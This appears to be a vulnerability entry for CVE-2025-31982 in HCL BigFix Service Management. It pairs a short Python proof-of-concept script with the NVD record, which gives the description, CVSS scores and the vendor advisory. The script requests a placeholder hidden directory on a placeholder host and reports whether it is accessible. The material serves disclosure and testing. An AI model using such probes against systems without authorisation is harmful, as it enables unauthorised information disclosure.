CVE-2025-31982

import requests # PoC for CVE-2025-31982: HCL BigFix SM Directory Access # Target: HCL BigFix Service Management def check_hidden_directory(base_url, hidden_path): """ Checks if a hidden directory is accessible directly. """ target_url = f"{base_url}/{hidden_path}" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } try: response = requests.get(target_url, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Vulnerability Confirmed: {target_url} is accessible.") print(f"[+] Response Content Preview: {response.text[:200]}") return True else: print(f"[-] Directory not accessible or non-existent. Status Code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") return False if __name__ == "__main__": # Example usage target = "http://target-host:port" # Note: Replace 'hidden_admin_dir' with the actual path disclosed in the vulnerability report path = "hidden_admin_dir" check_hidden_directory(target, path)

{"cve": {"id": "CVE-2025-31982", "sourceIdentifier": "[email protected]", "published": "2026-05-06T15:16:06.320", "lastModified": "2026-05-06T23:16:36.953", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL BigFix Service Management (SM) had directories that were not linked or publicly visible but could be accessed directly. This could allow an increased risk of information disclosure or misuse of sensitive functionality."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:L", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_service_management:23.0:*:*:*:*:*:*:*", "matchCriteriaId": "4D915AC1-7C2B-497D-9A77-9726954B2282"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}